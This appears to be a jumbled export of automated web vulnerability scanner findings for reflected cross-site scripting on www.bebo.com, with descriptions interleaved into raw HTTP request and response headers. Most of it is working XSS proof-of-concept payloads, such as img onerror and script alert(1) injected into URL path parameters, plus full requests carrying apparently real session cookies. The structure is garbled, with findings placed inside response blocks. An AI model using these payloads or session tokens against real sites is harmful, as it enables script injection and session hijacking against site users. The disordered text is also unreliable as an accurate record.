HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10873
Date: Mon, 15 Nov 2010 22:43:02 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2ccda<img%20src%3da%20onerror%3dalert(1)>98fbc4b56ab was submitted in the REST URL parameter 3. This input was echoed as 2ccda<img src=a onerror=alert(1)>98fbc4b56ab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/aol_auth/sgo2ccda<img%20src%3da%20onerror%3dalert(1)>98fbc4b56ab HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;

Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10573
Date: Mon, 15 Nov 2010 22:43:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85ee6"><img%20src%3da%20onerror%3dalert(1)>b80ea7e79f6 was submitted in the REST URL parameter 3. This input was echoed as 85ee6"><img src=a onerror=alert(1)>b80ea7e79f6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/aol_auth/sgo85ee6"><img%20src%3da%20onerror%3dalert(1)>b80ea7e79f6 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;

Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10591
Date: Mon, 15 Nov 2010 22:43:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5d606'><script>alert(1)</script>04a06b6a2f1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/aol_auth/sgo5d606'><script>alert(1)</script>04a06b6a2f1 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;

Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10497
Date: Mon, 15 Nov 2010 22:43:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e7b2e'%3b90c2b54f2da was submitted in the REST URL parameter 3. This input was echoed as e7b2e';90c2b54f2da in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/aol_auth/sgoe7b2e'%3b90c2b54f2da HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;

Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10303
Date: Mon, 15 Nov 2010 22:43:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f17a'%3be3cf120dda1 was submitted in the REST URL parameter 2. This input was echoed as 4f17a';e3cf120dda1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/apps4f17a'%3be3cf120dda1/browse_apps HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10615
Date: Mon, 15 Nov 2010 22:45:08 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e6a2"><img%20src%3da%20onerror%3dalert(1)>78f52f14a04 was submitted in the REST URL parameter 2. This input was echoed as 7e6a2"><img src=a onerror=alert(1)>78f52f14a04 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/apps7e6a2"><img%20src%3da%20onerror%3dalert(1)>78f52f14a04/browse_apps HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: es-ES
Content-Type: text/html; charset=UTF-8
Content-Length: 9321
Date: Mon, 15 Nov 2010 22:45:08 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a5583'><script>alert(1)</script>665adb4858e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/appsa5583'><script>alert(1)</script>665adb4858e/browse_apps HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10826
Date: Mon, 15 Nov 2010 22:45:08 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a8f40<script>alert(1)</script>9321b08d940 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/appsa8f40<script>alert(1)</script>9321b08d940/browse_apps HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10808
Date: Mon, 15 Nov 2010 22:45:09 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
...[SNIP]... <div class="mod">ERROR 404: Sorry, we dont have no /c/appsa8f40<script>alert(1)</script>9321b08d940/browse_apps page, please try again.</div> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8682"><img%20src%3da%20onerror%3dalert(1)>e0bf937f114 was submitted in the REST URL parameter 3. This input was echoed as d8682"><img src=a onerror=alert(1)>e0bf937f114 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/apps/browse_appsd8682"><img%20src%3da%20onerror%3dalert(1)>e0bf937f114 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10558
Date: Mon, 15 Nov 2010 22:45:11 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 45970'><script>alert(1)</script>32a1c61c494 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/apps/browse_apps45970'><script>alert(1)</script>32a1c61c494 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10464
Date: Mon, 15 Nov 2010 22:45:11 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 99ea8<img%20src%3da%20onerror%3dalert(1)>bfb2daec949 was submitted in the REST URL parameter 3. This input was echoed as 99ea8<img src=a onerror=alert(1)>bfb2daec949 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/apps/browse_apps99ea8<img%20src%3da%20onerror%3dalert(1)>bfb2daec949 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10540
Date: Mon, 15 Nov 2010 22:45:13 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
...[SNIP]... <div class="lyt-multi">Could not find action: browse_apps99ea8<img src=a onerror=alert(1)>bfb2daec949.</div> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e903'%3b6c2865e59c5 was submitted in the REST URL parameter 3. This input was echoed as 6e903';6c2865e59c5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/apps/browse_apps6e903'%3b6c2865e59c5 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10270
Date: Mon, 15 Nov 2010 22:45:11 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e2daa<script>alert(1)</script>1f98462b04c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/gamese2daa<script>alert(1)</script>1f98462b04c HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10709
Date: Mon, 15 Nov 2010 22:43:12 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
...[SNIP]... <div class="mod">ERROR 404: Sorry, we dont have no /c/gamese2daa<script>alert(1)</script>1f98462b04c page, please try again.</div> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 41c1d'><script>alert(1)</script>460634ba960 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/games41c1d'><script>alert(1)</script>460634ba960 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10727
Date: Mon, 15 Nov 2010 22:43:11 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24eee"><img%20src%3da%20onerror%3dalert(1)>14aea70584c was submitted in the REST URL parameter 2. This input was echoed as 24eee"><img src=a onerror=alert(1)>14aea70584c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/games24eee"><img%20src%3da%20onerror%3dalert(1)>14aea70584c HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10810
Date: Mon, 15 Nov 2010 22:43:11 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8285'%3b4d5fdd7652d was submitted in the REST URL parameter 2. This input was echoed as c8285';4d5fdd7652d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/gamesc8285'%3b4d5fdd7652d HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10516
Date: Mon, 15 Nov 2010 22:43:11 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 626db"><img%20src%3da%20onerror%3dalert(1)>76f4d607507 was submitted in the REST URL parameter 2. This input was echoed as 626db"><img src=a onerror=alert(1)>76f4d607507 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/invite626db"><img%20src%3da%20onerror%3dalert(1)>76f4d607507/join HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10864
Date: Mon, 15 Nov 2010 22:43:06 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 29a1a'><script>alert(1)</script>8145a15ce59 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
